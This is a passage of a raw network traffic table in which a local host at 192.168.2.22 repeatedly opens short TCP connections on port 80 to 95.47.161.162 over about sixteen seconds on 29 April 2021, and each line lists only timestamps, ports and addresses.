                                          Apr 29, 2021 08:22:00.612308979 CEST4924580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:00.851710081 CEST4924580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:00.853100061 CEST4924680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:00.939930916 CEST804924595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:00.940109015 CEST4924580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:00.940547943 CEST804924695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:00.940651894 CEST4924680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:00.941956043 CEST4924680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:01.029733896 CEST804924695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:01.067533970 CEST804924695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:01.067823887 CEST4924680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:01.295591116 CEST4924680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:01.297473907 CEST4924780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:01.383541107 CEST804924695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:01.383657932 CEST4924680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:01.392410040 CEST804924795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:01.392529964 CEST4924780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:01.393727064 CEST4924780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:01.488207102 CEST804924795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:01.522456884 CEST804924795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:01.522798061 CEST4924780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:01.742260933 CEST4924780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:01.743112087 CEST4924880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:01.832230091 CEST804924895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:01.832343102 CEST4924880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:01.833338976 CEST4924880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:01.837017059 CEST804924795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:01.837116003 CEST4924780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:01.922671080 CEST804924895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:01.958585024 CEST804924895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:01.958933115 CEST4924880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:02.185950994 CEST4924880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:02.188462973 CEST4924980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:02.275954008 CEST804924895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:02.276041985 CEST4924880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:02.277688026 CEST804924995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:02.277785063 CEST4924980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:02.279254913 CEST4924980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:02.368109941 CEST804924995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:02.402828932 CEST804924995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:02.402944088 CEST4924980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:02.641702890 CEST4924980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:02.642713070 CEST4925080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:02.731143951 CEST804924995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:02.731251001 CEST4924980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:02.732076883 CEST804925095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:02.732214928 CEST4925080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:02.733459949 CEST4925080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:02.823103905 CEST804925095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:02.858032942 CEST804925095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:02.858445883 CEST4925080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:03.090857029 CEST4925080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:03.093209982 CEST4925180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:03.181253910 CEST804925095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:03.181382895 CEST4925080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:03.184115887 CEST804925195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:03.184284925 CEST4925180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:03.185461998 CEST4925180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:03.274964094 CEST804925195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:03.309042931 CEST804925195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:03.309264898 CEST4925180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:03.544986963 CEST4925180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:03.547360897 CEST4925280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:03.638111115 CEST804925195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:03.638216972 CEST4925180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:03.641429901 CEST804925295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:03.641572952 CEST4925280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:03.642880917 CEST4925280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:03.737921953 CEST804925295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:03.772407055 CEST804925295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:03.772602081 CEST4925280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:03.994879007 CEST4925280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:03.995796919 CEST4925380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:04.089984894 CEST804925295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:04.090085983 CEST4925280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:04.090667963 CEST804925395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:04.090775967 CEST4925380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:04.091659069 CEST4925380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:04.186806917 CEST804925395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:04.220726967 CEST804925395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:04.220875025 CEST4925380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:04.452877045 CEST4925380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:04.454082966 CEST4925480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:04.547847986 CEST804925395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:04.548058033 CEST4925380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:04.550276041 CEST804925495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:04.550487995 CEST4925480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:04.551783085 CEST4925480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:04.645901918 CEST804925495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:04.679984093 CEST804925495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:04.680376053 CEST4925480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:04.915956974 CEST4925480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:04.918229103 CEST4925580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:05.010020018 CEST804925495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:05.010080099 CEST4925480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:05.012278080 CEST804925595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:05.012350082 CEST4925580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:05.013000011 CEST4925580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:05.107424974 CEST804925595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:05.146625042 CEST804925595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:05.146888971 CEST4925580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:05.368570089 CEST4925580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:05.370948076 CEST4925680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:05.459458113 CEST804925695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:05.459623098 CEST4925680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:05.461169958 CEST4925680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:05.463428974 CEST804925595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:05.463532925 CEST4925580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:05.551454067 CEST804925695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:05.587460041 CEST804925695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:05.587637901 CEST4925680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:05.820007086 CEST4925680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:05.822427034 CEST4925780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:05.910972118 CEST804925695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:05.911077023 CEST4925680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:05.918343067 CEST804925795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:05.918459892 CEST4925780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:05.919809103 CEST4925780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:06.015165091 CEST804925795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:06.051492929 CEST804925795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:06.051788092 CEST4925780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:06.264458895 CEST4925780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:06.265294075 CEST4925880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:06.353307962 CEST804925895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:06.353415966 CEST4925880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:06.354187965 CEST4925880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:06.359270096 CEST804925795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:06.359381914 CEST4925780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:06.442399025 CEST804925895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:06.475883007 CEST804925895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:06.476092100 CEST4925880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:06.729351044 CEST4925880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:06.731259108 CEST4925980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:06.817996979 CEST804925895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:06.818114042 CEST4925880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:06.826405048 CEST804925995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:06.826555967 CEST4925980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:06.828737974 CEST4925980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:06.923702955 CEST804925995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:06.957900047 CEST804925995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:06.958189011 CEST4925980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:07.193625927 CEST4925980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:07.195081949 CEST4926080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:07.288839102 CEST804925995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:07.288964987 CEST4925980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:07.289371967 CEST804926095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:07.289524078 CEST4926080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:07.290916920 CEST4926080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:07.385689020 CEST804926095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:07.423192978 CEST804926095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:07.423444986 CEST4926080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:07.644043922 CEST4926080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:07.646306992 CEST4926180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:07.737205982 CEST804926195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:07.737314939 CEST4926180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:07.738307953 CEST4926180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:07.738835096 CEST804926095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:07.739137888 CEST4926080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:07.828923941 CEST804926195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:07.863718987 CEST804926195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:07.863802910 CEST4926180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:08.097850084 CEST4926180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:08.100039959 CEST4926280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:08.188771009 CEST804926195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:08.188934088 CEST4926180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:08.194574118 CEST804926295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:08.194818020 CEST4926280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:08.195903063 CEST4926280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:08.290936947 CEST804926295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:08.325272083 CEST804926295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:08.325647116 CEST4926280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:08.542149067 CEST4926280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:08.543104887 CEST4926380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:08.633857965 CEST804926395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:08.633995056 CEST4926380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:08.634500980 CEST4926380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:08.636465073 CEST804926295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:08.636671066 CEST4926280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:08.725243092 CEST804926395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:08.760154963 CEST804926395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:08.760516882 CEST4926380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:08.987318039 CEST4926380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:08.989149094 CEST4926480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:09.078352928 CEST804926395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:09.078464985 CEST4926380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:09.079905987 CEST804926495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:09.080075979 CEST4926480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:09.081423044 CEST4926480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:09.172488928 CEST804926495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:09.212142944 CEST804926495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:09.212477922 CEST4926480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:09.440228939 CEST4926480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:09.442137003 CEST4926580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:09.530709028 CEST804926495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:09.530826092 CEST804926595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:09.531034946 CEST4926480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:09.531064034 CEST4926580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:09.532520056 CEST4926580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:09.622648001 CEST804926595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:09.657797098 CEST804926595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:09.657979012 CEST4926580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:09.892904043 CEST4926580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:09.894897938 CEST4926680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:09.983006954 CEST804926595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:09.983068943 CEST4926580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:09.989016056 CEST804926695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:09.989097118 CEST4926680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:09.989902973 CEST4926680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:10.085170984 CEST804926695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:10.122634888 CEST804926695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:10.122936964 CEST4926680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:10.347893000 CEST4926680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:10.350328922 CEST4926780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:10.441642046 CEST804926795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:10.441756964 CEST4926780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:10.442804098 CEST4926780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:10.442934036 CEST804926695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:10.443026066 CEST4926680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:10.533303022 CEST804926795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:10.569025993 CEST804926795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:10.569202900 CEST4926780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:10.794409990 CEST4926780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:10.799186945 CEST4926880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:10.884295940 CEST804926795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:10.884341955 CEST4926780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:10.887631893 CEST804926895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:10.887680054 CEST4926880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:10.888163090 CEST4926880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:10.976052999 CEST804926895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:11.011018991 CEST804926895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:11.011131048 CEST4926880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:11.235259056 CEST4926880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:11.237669945 CEST4926980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:11.323446989 CEST804926895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:11.323568106 CEST4926880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:11.332263947 CEST804926995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:11.332501888 CEST4926980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:11.333842039 CEST4926980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:11.429124117 CEST804926995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:11.465650082 CEST804926995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:11.465955973 CEST4926980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:11.687190056 CEST4926980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:11.689270973 CEST4927080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:11.777751923 CEST804927095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:11.777878046 CEST4927080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:11.779228926 CEST4927080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:11.782192945 CEST804926995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:11.782310963 CEST4926980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:11.867654085 CEST804927095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:11.902065992 CEST804927095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:11.902317047 CEST4927080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:12.120346069 CEST4927080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:12.122119904 CEST4927180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:12.208327055 CEST804927095.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:12.208614111 CEST4927080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:12.210664988 CEST804927195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:12.210916996 CEST4927180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:12.212189913 CEST4927180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:12.300847054 CEST804927195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:12.333988905 CEST804927195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:12.335134029 CEST4927180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:12.559933901 CEST4927180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:12.561419964 CEST4927280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:12.649234056 CEST804927195.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:12.649280071 CEST804927295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:12.649410963 CEST4927280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:12.649439096 CEST4927180192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:12.650474072 CEST4927280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:12.738749981 CEST804927295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:12.773057938 CEST804927295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:12.773197889 CEST4927280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:12.996026993 CEST4927280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:12.997745037 CEST4927380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:13.084278107 CEST804927295.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:13.084381104 CEST4927280192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:13.086307049 CEST804927395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:13.086406946 CEST4927380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:13.087593079 CEST4927380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:13.175862074 CEST804927395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:13.209937096 CEST804927395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:13.210019112 CEST4927380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:13.427546978 CEST4927380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:13.429016113 CEST4927480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:13.516556025 CEST804927395.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:13.516622066 CEST804927495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:13.516681910 CEST4927380192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:13.516815901 CEST4927480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:13.518112898 CEST4927480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:13.606072903 CEST804927495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:13.640049934 CEST804927495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:13.640321970 CEST4927480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:13.870556116 CEST4927480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:13.872284889 CEST4927580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:13.958551884 CEST804927495.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:13.958750963 CEST4927480192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:13.960340977 CEST804927595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:13.960613966 CEST4927580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:13.961709976 CEST4927580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:14.050316095 CEST804927595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:14.088989019 CEST804927595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:14.089176893 CEST4927580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:14.323046923 CEST4927580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:14.324649096 CEST4927680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:14.411421061 CEST804927595.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:14.411602020 CEST4927580192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:14.418803930 CEST804927695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:14.419116974 CEST4927680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:14.420356035 CEST4927680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:14.514276028 CEST804927695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:14.547636986 CEST804927695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:14.547815084 CEST4927680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:14.775902987 CEST4927680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:14.777590036 CEST4927780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:14.870543957 CEST804927695.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:14.870731115 CEST4927680192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:14.871440887 CEST804927795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:14.871562958 CEST4927780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:14.873043060 CEST4927780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:14.967288017 CEST804927795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:15.002720118 CEST804927795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:15.003098011 CEST4927780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:15.232342005 CEST4927780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:15.234452009 CEST4927880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:15.323954105 CEST804927895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:15.324104071 CEST4927880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:15.325035095 CEST4927880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:15.326287985 CEST804927795.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:15.326375008 CEST4927780192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:15.413830996 CEST804927895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:15.447942019 CEST804927895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:15.448074102 CEST4927880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:15.675288916 CEST4927880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:15.676994085 CEST4927980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:15.764816046 CEST804927895.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:15.766149044 CEST4927880192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:15.766707897 CEST804927995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:15.766817093 CEST4927980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:15.767858028 CEST4927980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:15.857140064 CEST804927995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:15.891278028 CEST804927995.47.161.162192.168.2.22
                                          Apr 29, 2021 08:22:15.891422987 CEST4927980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:16.110632896 CEST4927980192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:16.111908913 CEST4928080192.168.2.2295.47.161.162
                                          Apr 29, 2021 08:22:16.200273991 CEST804927995.47.161.162192.168.2.22
